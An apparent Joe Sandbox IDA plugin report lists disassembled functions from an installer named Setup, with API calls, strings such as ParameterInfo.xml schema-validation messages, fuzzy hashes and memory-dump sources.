                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Not$ParameterInfo.xml$schema validation failure: Not must have exactly 1 child node
                                                              • API String ID: 2489616738-1102589135
                                                              • Opcode ID: 46f0d6690a7c487342503628b0fe5e44fd9edded88853a8387c58c3072436d64
                                                              • Instruction ID: c119208bf893ab80453cdeaeb3cb9293cfaf5692a4a808e3fea242059470d118
                                                              • Opcode Fuzzy Hash: 46f0d6690a7c487342503628b0fe5e44fd9edded88853a8387c58c3072436d64
                                                              • Instruction Fuzzy Hash: C041A371911149EFDB04CBE8C955FEEBBB8AF26308F144559E014EBB80CB35DA09C7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9231C2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9231C9
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: CommandLine$ItemRef$LogFile$Name
                                                              • API String ID: 431132790-1099889147
                                                              • Opcode ID: 33f0ce54d46578e3e9251a27729ebf3c455c50e3d5785e5e32f49b3de9834336
                                                              • Instruction ID: 62da40d3554a7b503b1eba71f2cd7999907c60b5a7ed5ba5a2dd9a8b114d740f
                                                              • Opcode Fuzzy Hash: 33f0ce54d46578e3e9251a27729ebf3c455c50e3d5785e5e32f49b3de9834336
                                                              • Instruction Fuzzy Hash: E841747191020AEFDF04CFA8C945ADE7BB9BF65308F244559E414EBB80CB35EA05CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9256A3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C95988C: __EH_prolog3.LIBCMT ref: 6C959893
                                                                • Part of subcall function 6C95988C: GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C95988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                                • Part of subcall function 6C9257E5: __EH_prolog3.LIBCMT ref: 6C9257EC
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                                • Part of subcall function 6C91A8CC: SetFilePointer.KERNEL32(?,00000000,6C90A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C91AA49
                                                                • Part of subcall function 6C91A8CC: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91AA97
                                                                • Part of subcall function 6C91A8CC: SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C91AAAC
                                                              • SysFreeString.OLEAUT32(?), ref: 6C92578A
                                                              • SysFreeString.OLEAUT32(?), ref: 6C925799
                                                              • SysFreeString.OLEAUT32(?), ref: 6C9257C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3String$FileFree$PathRelative$AllocCommandException@8LineModuleNamePointerReadThrow_memcpy_s
                                                              • String ID: ParameterInfo.xml$UiInfo.xml
                                                              • API String ID: 3873923459-386449131
                                                              • Opcode ID: 3aa8dfd21e384ed63a5db6a2610f9a3dd0129566da3e5006dccadebfb743637f
                                                              • Instruction ID: 3e784948b15a022d5dd41a79602deac095a609e862907abb76f3ecf0e1c38130
                                                              • Opcode Fuzzy Hash: 3aa8dfd21e384ed63a5db6a2610f9a3dd0129566da3e5006dccadebfb743637f
                                                              • Instruction Fuzzy Hash: A431A2B1818345ABC710DF68C844A8BB7E8AFA5618F040E1DF4D0D7780D734D8088B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95972F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C925044: __EH_prolog3.LIBCMT ref: 6C92504B
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • GetCommandLineW.KERNEL32(?,?,?,?,512AC3CC,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794), ref: 6C9597B2
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • SysFreeString.OLEAUT32(?), ref: 6C95985E
                                                                • Part of subcall function 6C924798: __EH_prolog3.LIBCMT ref: 6C92479F
                                                                • Part of subcall function 6C9250D5: __EH_prolog3_catch.LIBCMT ref: 6C9250DC
                                                                • Part of subcall function 6C9250D5: CoInitialize.OLE32(00000000), ref: 6C92512A
                                                                • Part of subcall function 6C9250D5: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,00000738,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C925148
                                                                • Part of subcall function 6C9250D5: CoUninitialize.OLE32(02642228,?,succeeded,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C9251E6
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959818
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959833
                                                              Strings
                                                              • Loading localized engine data for language %d from %s, xrefs: 6C95977B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrowUninitialize
                                                              • String ID: Loading localized engine data for language %d from %s
                                                              • API String ID: 509998568-3315213612
                                                              • Opcode ID: aafa293f06715198766286cc9f3cf523c89aaba8d43a67cb3c2c02b4dc4aec0a
                                                              • Instruction ID: 22e691ce146de2dcec8ab9de90a624eaf88957399ca49f4e464e59b9ddc9e0cd
                                                              • Opcode Fuzzy Hash: aafa293f06715198766286cc9f3cf523c89aaba8d43a67cb3c2c02b4dc4aec0a
                                                              • Instruction Fuzzy Hash: E7416E72018344AFD311DF64CC45E9BBBE8BFA5328F100A19F5A592A90DB34D908CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9219AD Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C918B9F: __EH_prolog3.LIBCMT ref: 6C918BA6
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                              Strings
                                                              • schema validation failure: , xrefs: 6C921A40
                                                              • can only have one logical or arithmietic expression for a child node, xrefs: 6C921A54
                                                              • ParameterInfo.xml, xrefs: 6C921902, 6C921A2F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: can only have one logical or arithmietic expression for a child node$ParameterInfo.xml$schema validation failure:
                                                              • API String ID: 2489616738-4045823434
                                                              • Opcode ID: d156ce5b0d6dee203486c1c79d90fa4cea20238379f45e3e6b77ad60ee56a00e
                                                              • Instruction ID: fdaccfa44b4b3d42fa9ea666efdc9bb82ad7b0ae323d212e45b6375c74823dde
                                                              • Opcode Fuzzy Hash: d156ce5b0d6dee203486c1c79d90fa4cea20238379f45e3e6b77ad60ee56a00e
                                                              • Instruction Fuzzy Hash: DE415E71911109AFDB14DFA8C945BEEBBB8BF25318F148559E014EBB80CB31DA09CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C921C2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C921C35
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9219AD: __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C9219AD: __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                                • Part of subcall function 6C918AAC: __EH_prolog3.LIBCMT ref: 6C918AB3
                                                                • Part of subcall function 6C918AAC: __CxxThrowException@8.LIBCMT ref: 6C918B39
                                                                • Part of subcall function 6C9192D1: __EH_prolog3.LIBCMT ref: 6C9192D8
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921D02
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                              • String ID: IsPresent$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                              • API String ID: 2724732616-4158871691
                                                              • Opcode ID: 8298c29c1dc51d39ae099a69577370beed31a3c932e4b85cd5de1207d12f555b
                                                              • Instruction ID: 7104e0a980a2231d2dca08a9883059d90dc303c94c15cd76a77e8d72525ae03e
                                                              • Opcode Fuzzy Hash: 8298c29c1dc51d39ae099a69577370beed31a3c932e4b85cd5de1207d12f555b
                                                              • Instruction Fuzzy Hash: E2218972811148BADF14DBA8C941ADD7BB9AF36318F148549F024ABF80CB31DA19D7A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C921D3D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9219AD: __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C9219AD: __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                                • Part of subcall function 6C918AAC: __EH_prolog3.LIBCMT ref: 6C918AB3
                                                                • Part of subcall function 6C918AAC: __CxxThrowException@8.LIBCMT ref: 6C918B39
                                                                • Part of subcall function 6C9192D1: __EH_prolog3.LIBCMT ref: 6C9192D8
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$DispatcherExceptionUser
                                                              • String ID: ApplicableIf$ParameterInfo.xml$schema validation failure: IsPresent can only be authored once.
                                                              • API String ID: 2724732616-3920316726
                                                              • Opcode ID: aad640c18342a99a34fc45ef6f581b3210a6564b0f315a97b945bdd4c5b41ac5
                                                              • Instruction ID: 1bc60195a114640848d16655e5cc099b90db1137bec8bb02350f3a79e4cd6438
                                                              • Opcode Fuzzy Hash: aad640c18342a99a34fc45ef6f581b3210a6564b0f315a97b945bdd4c5b41ac5
                                                              • Instruction Fuzzy Hash: 75218C71810148BACF14DBA8C945ADD7BB9AF36358F148549F124ABF80CB31DA18D766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4AD763 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C4AD771
                                                                • Part of subcall function 6C4A8FCB: __FF_MSGBANNER.LIBCMT ref: 6C4A8FE4
                                                                • Part of subcall function 6C4A8FCB: __NMSG_WRITE.LIBCMT ref: 6C4A8FEB
                                                                • Part of subcall function 6C4A8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,6C4A91D6,?), ref: 6C4A9010
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_malloc
                                                              • String ID: Q~Kl
                                                              • API String ID: 501242067-1527990588
                                                              • Opcode ID: ba7be03472c3fa7ff567655a5e7b398bb0f6ba3d63ead05f4ce8a8222ae2f163
                                                              • Instruction ID: c2e37911cd3f310faa7a285069a326069c1e2dc66589896c794c31de144bfb73
                                                              • Opcode Fuzzy Hash: ba7be03472c3fa7ff567655a5e7b398bb0f6ba3d63ead05f4ce8a8222ae2f163
                                                              • Instruction Fuzzy Hash: DB110B76D051159BCB25DAF49804ECA37A49B653B9B14052EEC549AF58DB30C88387D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95360F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 6C95365F
                                                              • GetLastError.KERNEL32 ref: 6C953669
                                                                • Part of subcall function 6C917479: __EH_prolog3.LIBCMT ref: 6C917480
                                                              • GetLastError.KERNEL32 ref: 6C95368B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CheckH_prolog3MembershipToken
                                                              • String ID: AllocateAndInitializeSid$CheckTokenMembership
                                                              • API String ID: 3752544998-2579124284
                                                              • Opcode ID: 7121ff14211efe2a733891b06e8ebd7718ca8ae97f1f106287a9d5ecda9e128a
                                                              • Instruction ID: 677ee4b2d9b76812a69cb73b0ef86820bd3dbaab202ae80e03345b05de5a7476
                                                              • Opcode Fuzzy Hash: 7121ff14211efe2a733891b06e8ebd7718ca8ae97f1f106287a9d5ecda9e128a
                                                              • Instruction Fuzzy Hash: 45117C74B00209EFDB04DFA5C98AC6EBBB9FF58314B51096DE456A3680DB70E900CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49D073 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49D07A
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 6C49D130
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              Strings
                                                              • IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S, xrefs: 6C49D0BF
                                                              • IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT, xrefs: 6C49D0A3
                                                              • IDS_INSTALL_WARNING_DESCRIPTION_FORMAT, xrefs: 6C49D0F4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ItemText
                                                              • String ID: IDS_INSTALL_ABORTED_DESCRIPTION_FORMAT_1S$IDS_INSTALL_WARNING_DESCRIPTION_FORMAT$IDS_SUCCESS_BLOCKERS_DESCRIPTION_TEXT
                                                              • API String ID: 2878149499-3033223209
                                                              • Opcode ID: 5afeb97b36aae620d974753afa16b33b982a7246f7ace3eb5d77e23feb3355d9
                                                              • Instruction ID: 8dfeb6bc36bf7775ee189806ca06ebd02896db66744a42488de4093009ec81c2
                                                              • Opcode Fuzzy Hash: 5afeb97b36aae620d974753afa16b33b982a7246f7ace3eb5d77e23feb3355d9
                                                              • Instruction Fuzzy Hash: 17217C31904549DFDB00EBE4C949EAEBBF2BF46308F18445CE056AB791DB30E909CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49CFA5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49CFAC
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • GetDlgItem.USER32(?,00000067), ref: 6C49D018
                                                                • Part of subcall function 6C48E2E1: GetCurrentProcess.KERNEL32(00000000,0000000D,?,?,6C49DFD0,00000000), ref: 6C48E319
                                                                • Part of subcall function 6C48E2E1: FlushInstructionCache.KERNEL32(00000000,?,?,6C49DFD0,00000000), ref: 6C48E320
                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6C49D041
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 6C49D05A
                                                              Strings
                                                              • IDS_BLOCK_DIALOGS_SYSLINK_TEXT, xrefs: 6C49CFB5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Item$CacheCurrentFlushInstructionLongProcessTextWindow
                                                              • String ID: IDS_BLOCK_DIALOGS_SYSLINK_TEXT
                                                              • API String ID: 2244164258-355004722
                                                              • Opcode ID: 72f5a4c82f0d175012f9577f6ee7c4ee2c28acefb6039cf5574ec56ddc841cae
                                                              • Instruction ID: 0b0612c48b658bf2c0b4571330c3a719bd0d2f8d003cf9dcfd974cc50781e8a7
                                                              • Opcode Fuzzy Hash: 72f5a4c82f0d175012f9577f6ee7c4ee2c28acefb6039cf5574ec56ddc841cae
                                                              • Instruction Fuzzy Hash: E6217A71901216DFDF10DFA8C848EAEBBF5BF05318B144558E865EB7A1DB30E909CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9258F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9258FC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • StrPBrkW.SHLWAPI(00000000,) <>",#(loc.,?,6C94FA6E,6C94FA6E,00000718,02642228,?,00000000,00000010,6C926171,00000000,00000748,?,ParameterInfo.xml), ref: 6C925972
                                                              • SysFreeString.OLEAUT32(6C94FA6E), ref: 6C9259A3
                                                                • Part of subcall function 6C968C9E: _memcpy_s.LIBCMT ref: 6C968CE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8FileFreeModuleNamePathRelativeStringThrow_memcpy_s
                                                              • String ID: #(loc.$) <>"
                                                              • API String ID: 3035459583-3905424865
                                                              • Opcode ID: eefcc8f60c0383a10d7e80685dded5c809b3cebed941686e49c684cbae3f88fa
                                                              • Instruction ID: 2d9b46220af21b50bd4880028457392407e1095ffcf3f6a4443b5cfe9a51aefa
                                                              • Opcode Fuzzy Hash: eefcc8f60c0383a10d7e80685dded5c809b3cebed941686e49c684cbae3f88fa
                                                              • Instruction Fuzzy Hash: F511DC71D1111A9FCF10DFA4CC089EEB778BF21368B400A25E420A7F94D738C909DBA0
                                                              Uniqueness

